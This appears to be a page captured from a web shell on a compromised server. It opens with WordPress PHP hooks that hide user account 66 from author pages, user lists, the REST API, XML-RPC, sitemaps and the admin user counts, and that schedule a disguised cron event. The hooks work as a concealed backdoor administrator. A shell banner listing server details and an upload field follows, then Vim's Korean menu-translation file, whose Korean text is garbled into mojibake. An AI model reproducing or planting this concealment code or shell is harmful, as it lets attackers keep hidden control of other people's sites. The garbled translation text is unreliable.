add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /usr/share/vim/vim91/lang/ |
Upload File : |
" Menu Translations: Korean
" Maintainer: SungHyun Nam <goweol@gmail.com>
" Last Change: 2012 May 01
" Generated from menu_ko_kr.utf-8.vim, DO NOT EDIT
" Quit when menu translations have already been done.
if exists("did_menu_trans")
finish
endif
let did_menu_trans = 1
let s:keepcpo= &cpo
set cpo&vim
scriptencoding euc-kr
" Help menu
menutrans &Help ����(&H)
menutrans &Overview<Tab><F1> ����(&O)<Tab><F1>
menutrans &User\ Manual ����\ �Ŵ���(&U)
menutrans &How-to\ links �Ͽ��\ ���(&H)
menutrans &GUI GUI(&G)
menutrans &Find\.\.\. �(&F)\.\.\.
menutrans &Credits ����\ ��(&C)
menutrans Co&pying ���۱�(&p)
menutrans &Sponsor/Register �Ŀ�/���(&S)
menutrans O&rphans ���(&r)
menutrans &Version ����(&V)
menutrans &About ��\ ����(&A)
" File menu
menutrans &File ���(&F)
menutrans &Open\.\.\.<Tab>:e ����(&O)\.\.\.<Tab>:e
menutrans Sp&lit-Open\.\.\.<Tab>:sp ������\ ����(&l)\.\.\.<Tab>:sp
menutrans Open\ &Tab\.\.\.<Tab>:tabnew ��\ ����(&T)\.\.\.<Tab>:tabnew
menutrans &New<Tab>:enew ���ο�(&N)<Tab>:enew
menutrans &Close<Tab>:close �ݱ�(&C)<Tab>:close
menutrans &Save<Tab>:w ����(&S)<Tab>:w
menutrans Save\ &As\.\.\.<Tab>:sav �ٸ�\ �̸�����\ ����(&A)\.\.\.<Tab>:sav
"menutrans Split\ &Diff\ with\.\.\. Split\ &Diff\ with\.\.\.
"menutrans Split\ Patched\ &By\.\.\. Split\ Patched\ &By\.\.\.
menutrans &Print �μ�(&P)
menutrans Sa&ve-Exit<Tab>:wqa �����ϰ�\ ������(&v)<Tab>:wqa
menutrans E&xit<Tab>:qa ������(&x)<Tab>:qa
" Edit menu
menutrans &Edit ��(&E)
menutrans &Undo<Tab>u ���(&U)<Tab>u
menutrans &Redo<Tab>^R �ٽ�\ ����(&R)<Tab>^R
menutrans Rep&eat<Tab>\. ��Ǯ��(&e)<Tab>\.
menutrans Cu&t<Tab>"+x �ڸ���(&t)<Tab>"+x
menutrans &Copy<Tab>"+y ����(&C)<Tab>"+y
menutrans &Paste<Tab>"+gP ��̱�(&P)<Tab>"+gP
menutrans Put\ &Before<Tab>[p �տ�\ ��̱�(&B)<Tab>[p
menutrans Put\ &After<Tab>]p �ڿ�\ ��̱�(&A)<Tab>]p
menutrans &Delete<Tab>x �����(&D)<Tab>x
menutrans &Select\ All<Tab>ggVG ���\ ����(&S)<Tab>ggVG
menutrans &Find\.\.\. �(&F)\.\.\.
menutrans Find\ and\ Rep&lace\.\.\. ã�Ƽ�\ �ٲٱ�(&l)\.\.\.
menutrans Settings\ &Window ����\ â(&W)
menutrans Startup\ &Settings ���\ ����(&S)
" Edit/Global Settings
menutrans &Global\ Settings ����\ ����(&G)
menutrans Toggle\ Pattern\ &Highlight<Tab>:set\ hls! ����\ ��̶��Ʈ\ ���(&H)<Tab>:set\ hls!
menutrans Toggle\ &Ignore-case<Tab>:set\ ic! ��ҹ���\ ����\ ���(&I)<Tab>:set\ ic!
menutrans Toggle\ &Showmatch<Tab>:set\ sm! Showmatch\ ���(&S)<Tab>:set\ sm!
menutrans &Context\ lines ���ؽ�Ʈ\ ��(&C)
menutrans &Virtual\ Edit ����\ ��(&V)
menutrans Never ���\ ��\ ��
menutrans Block\ Selection ��\ ����
menutrans Insert\ mode ���\ ���
menutrans Block\ and\ Insert ����\ ���
menutrans Always ��\ ���
menutrans Toggle\ Insert\ &Mode<Tab>:set\ im! ���\ ���\ ���(&M)<Tab>:set\ im!
menutrans Toggle\ Vi\ C&ompatible<Tab>:set\ cp! Vi\ ȣȯ\ ���(&o)<Tab>:set\ cp!
menutrans Search\ &Path\.\.\. �\ ���(&P)\.\.\.
menutrans Ta&g\ Files\.\.\. ����ǥ\ ���(&g)\.\.\.
" GUI options
menutrans Toggle\ &Toolbar ��������\ ���(&T)
menutrans Toggle\ &Bottom\ Scrollbar �ٴ�\ ��ũ�ѹ�\ ���(&B)
menutrans Toggle\ &Left\ Scrollbar ����\ ��ũ�ѹ�\ ���(&L)
menutrans Toggle\ &Right\ Scrollbar ������\ ��ũ�ѹ�\ ���(&R)
" Edit/File Settings
menutrans F&ile\ Settings ���\ ����(&i)
" Boolean options
menutrans Toggle\ Line\ &Numbering<Tab>:set\ nu! ��\ ��ȣ��̱�\ ���(&N)<Tab>:set\ nu!
menutrans Toggle\ &List\ Mode<Tab>:set\ list! ���\ ���\ ���(&L)<Tab>:set\ list!
menutrans Toggle\ Line\ &Wrap<Tab>:set\ wrap! ��\ Wrap\ ���(&W)<Tab>:set\ wrap!
menutrans Toggle\ W&rap\ at\ word<Tab>:set\ lbr! ��������\ Wrap\ ���(&r)<Tab>:set\ lbr!
menutrans Toggle\ &expand-tab<Tab>:set\ et! ��\ Ȯ��\ ���(&e)<Tab>:set\ et!
menutrans Toggle\ &auto-indent<Tab>:set\ ai! �ڵ��ε�Ʈ\ ���(&a)<Tab>:set\ ai!
menutrans Toggle\ &C-indenting<Tab>:set\ cin! C-���\ ���(&C)<Tab>:set\ cin!
" other options
menutrans &Shiftwidth ���Ʈ\ �ʺ�(&S)
menutrans Soft\ &Tabstop ���Ʈ\ �ǽ���(&T)
menutrans Te&xt\ Width\.\.\. �ؽ�Ʈ\ �ʺ�(&x)\.\.\.
menutrans &File\ Format\.\.\. ���\ ���(&F)\.\.\.
menutrans C&olor\ Scheme �÷�\ ��Ŵ(&o)
menutrans &Keymap ��(&K)
menutrans Select\ Fo&nt\.\.\. �۲�\ ����(&F)\.\.\.
" Programming menu
menutrans &Tools ����(&T)
menutrans &Jump\ to\ this\ tag<Tab>g^] ��\ ����ǥ��\ ����(&J)<Tab>g^]
menutrans Jump\ &back<Tab>^T �ڷ�\ ����(&b)<Tab>^T
menutrans Build\ &Tags\ File ����ǥ\ ���\ �����(&T)
menutrans &Spelling ����\ �˻�(&S)
menutrans &Spell\ Check\ On ����\ �˻�\ ���(&S)
menutrans Spell\ Check\ &Off ����\ �˻�\ ��(&O)
menutrans To\ &Next\ error<Tab>]s ���\ ������(&N)<Tab>]s
menutrans To\ &Previous\ error<Tab>[s ���\ ������(&P)<Tab>[s
menutrans Suggest\ &Corrections<Tab>z= ����\ ����(&C)<Tab>z=
menutrans &Repeat\ correction<Tab>:spellrepall ����\ �ݺ�(&R)<Tab>:spellrepall
menutrans Set\ language\ to\ "en" ��\ "en"����\ ����
menutrans Set\ language\ to\ "en_au" ��\ "en_au"��\ ����
menutrans Set\ language\ to\ "en_ca" ��\ "en_ca"��\ ����
menutrans Set\ language\ to\ "en_gb" ��\ "en_gb"��\ ����
menutrans Set\ language\ to\ "en_nz" ��\ "en_nz"����\ ����
menutrans Set\ language\ to\ "en_us" ��\ "en_us"��\ ����
menutrans &Find\ More\ Languages �ٸ�\ ���\ ã��(&F)
" Tools.Fold Menu
menutrans &Folding ����(&F)
" open close folds
menutrans &Enable/Disable\ folds<Tab>zi ����\ ���\ ���(&E)<Tab>zi
menutrans &View\ Cursor\ Line<Tab>zv Ŀ��\ ��\ ����(&V)<Tab>zv
menutrans Vie&w\ Cursor\ Line\ only<Tab>zMzx Ŀ��\ �ٸ�\ ����(&w)<Tab>zMzx
menutrans C&lose\ more\ folds<Tab>zm ��\ ����\ ����\ �ݱ�(&l)<Tab>zm
menutrans &Close\ all\ folds<Tab>zM ���\ ����\ �ݱ�(&C)<Tab>zM
menutrans O&pen\ more\ folds<Tab>zr ��\ ����\ ����\ ����(&p)<Tab>zr
menutrans &Open\ all\ folds<Tab>zR ���\ �κ�\ ���\ ���(&O)<Tab>zR
" fold method
menutrans Fold\ Met&hod ����\ ��(&h)
menutrans M&anual ����(&a)
menutrans I&ndent �鿩����(&n)
menutrans E&xpression ǥ���(&x)
menutrans S&yntax ���ý�(&y)
"menutrans &Diff &Diff
menutrans Ma&rker ����ǥ(&r)
" create and delete folds
menutrans Create\ &Fold<Tab>zf ����\ ����(&F)<Tab>zf
menutrans &Delete\ Fold<Tab>zd ����\ ��(&D)<Tab>zd
menutrans Delete\ &All\ Folds<Tab>zD ���\ ����\ ��(&A)<Tab>zD
" moving around in folds
menutrans Fold\ column\ &width ����\ �÷�\ �ʺ�(&w)
"menutrans &Diff &Diff
menutrans &Update ����(&U)
menutrans &Get\ Block ��\ ��������(&G)
menutrans &Put\ Block ��\ ����ֱ�(&P)
menutrans &Make<Tab>:make ���(&M)<Tab>:make
menutrans &List\ Errors<Tab>:cl ����\ ���\ ����(&L)<Tab>:cl
menutrans L&ist\ Messages<Tab>:cl! ���\ ���\ ����(&i)<Tab>:cl!
menutrans &Next\ Error<Tab>:cn ���\ ����(&N)<Tab>:cn
menutrans &Previous\ Error<Tab>:cp ���\ ����(&P)<Tab>:cp
menutrans &Older\ List<Tab>:cold ������\ ���(&O)<Tab>:cold
menutrans N&ewer\ List<Tab>:cnew ���ο�\ ���(&e)<Tab>:cnew
menutrans Error\ &Window ����\ â(&W)
menutrans &Update<Tab>:cwin ����(&U)<Tab>:cwin
menutrans &Open<Tab>:copen ����(&O)<Tab>:copen
menutrans &Close<Tab>:cclose �ݱ�(&C)<Tab>:cclose
menutrans Se&T\ Compiler ����Ϸ�\ ����(&T)
menutrans &Convert\ to\ HEX<Tab>:%!mc\ vim:xxd ���������\ ��ȯ<Tab>:%!mc\ vim:xxd
menutrans &Convert\ to\ HEX<Tab>:%!xxd ���������\ ��ȯ(&C)<Tab>:%!xxd
menutrans Conve&rt\ back<Tab>:%!mc\ vim:xxd\ -r �������\ ��ȯ(&r)<Tab>:%!mc\ vim:xxd\ -r
menutrans Conve&rt\ back<Tab>:%!xxd\ -r �������\ ��ȯ(&r)<Tab>:%!xxd\ -r
" Names for buffer menu.
menutrans &Buffers ����(&B)
menutrans &Refresh\ menu ���ǥ\ �ٽñ���(&R)
menutrans &Delete �����(&D)
menutrans &Alternate ��ü(&A)
menutrans &Next ���(&N)
menutrans &Previous ���(&P)
" Window menu
menutrans &Window â(&W)
menutrans &New<Tab>^Wn ��\ â(&N)<Tab>^Wn
menutrans S&plit<Tab>^Ws ������(&p)<Tab>^Ws
menutrans Sp&lit\ To\ #<Tab>^W^^ #����\ ������(&l)<Tab>^W^^
menutrans Split\ &Vertically<Tab>^Wv ���η�\ ������(&V)<Tab>^Wv
menutrans Split\ File\ E&xplorer ���\ �ͽ��÷η�\ ������
menutrans &Close<Tab>^Wc �ݱ�(&C)<Tab>^Wc
menutrans Close\ &Other(s)<Tab>^Wo �ٸ�\ â\ �ݱ�(&O)<Tab>^Wo
menutrans Move\ &To �̵�(&T)
menutrans &Top<Tab>^WK �����(&T)<Tab>^WK
menutrans &Bottom<Tab>^WJ �ٴ�(&B)<Tab>^WJ
menutrans &Left\ side<Tab>^WH ����(&L)<Tab>^WH
menutrans &Right\ side<Tab>^WL ������(&R)<Tab>^WL
menutrans Rotate\ &Up<Tab>^WR ����\ ȸ��(&U)<Tab>^WR
menutrans Rotate\ &Down<Tab>^Wr �Ʒ���\ ȸ��(&D)<Tab>^Wr
menutrans &Equal\ Size<Tab>^W= ����\ ��̷�(&E)<Tab>^W=
menutrans &Max\ Height<Tab>^W_ �ִ�\ ��̷�(&M)<Tab>^W_
menutrans M&in\ Height<Tab>^W1_ �ּ�\ ��̷�(&i)<Tab>^W1_
menutrans Max\ &Width<Tab>^W\| �ִ�\ ��̷�(&W)<Tab>^W\|
menutrans Min\ Widt&h<Tab>^W1\| �ּ�\ ��̷�(&h)<Tab>^W1\|
" The popup menu
menutrans &Undo ���(&U)
menutrans Cu&t �ڸ���(&t)
menutrans &Copy ����(&C)
menutrans &Paste ��̱�(&P)
menutrans &Delete �����(&D)
menutrans Select\ Blockwise �簢�\ ����
menutrans Select\ &Word ����\ ����(&W)
menutrans Select\ &Line ��\ ����(&L)
menutrans Select\ &Block ��ȹ\ ����(&B)
menutrans Select\ &All ���\ ����(&A)
" The GUI toolbar
if has("toolbar")
if exists("*Do_toolbar_tmenu")
delfun Do_toolbar_tmenu
endif
fun Do_toolbar_tmenu()
tmenu ToolBar.Open ��� ����
tmenu ToolBar.Save ��� ��� ����
tmenu ToolBar.SaveAll ��� ����
tmenu ToolBar.Print �μ�
tmenu ToolBar.Undo ���
tmenu ToolBar.Redo �ٽ� ����
tmenu ToolBar.Cut �ڸ���
tmenu ToolBar.Copy ����
tmenu ToolBar.Paste ��̱�
tmenu ToolBar.Find �...
tmenu ToolBar.FindNext ��� �
tmenu ToolBar.FindPrev ��� �
tmenu ToolBar.Replace �ٲٱ�
tmenu ToolBar.LoadSesn ���� ���
tmenu ToolBar.SaveSesn ���� ����
tmenu ToolBar.RunScript ��ũ��Ʈ ����
tmenu ToolBar.Make Make
tmenu ToolBar.Shell ��
tmenu ToolBar.RunCtags ����ǥ �����
tmenu ToolBar.TagJump ����ǥ�� ����
tmenu ToolBar.Help ����
tmenu ToolBar.FindHelp ���� �...
endfun
endif
" Syntax menu
menutrans &Syntax ����(&S)
menutrans &Show\ filetypes\ in\ menu ���\ ������\ ��\ ����(&S)
menutrans Set\ '&syntax'\ only 'syntax'��\ ����(&s)
menutrans Set\ '&filetype'\ too 'filetype'��\ ����(&f)
menutrans &Off ���(&O)
menutrans &Manual ����(&M)
menutrans A&utomatic �ڵ�(&u)
menutrans on/off\ for\ &This\ file ��\ ��ϸ�\ �ѱ�/���(&T)
menutrans Co&lor\ test ��\ ����(&l)
menutrans &Highlight\ test Highlight\ ����(&H)
menutrans &Convert\ to\ HTML HTML��\ ��ȯ(&C)
let &cpo = s:keepcpo
unlet s:keepcpo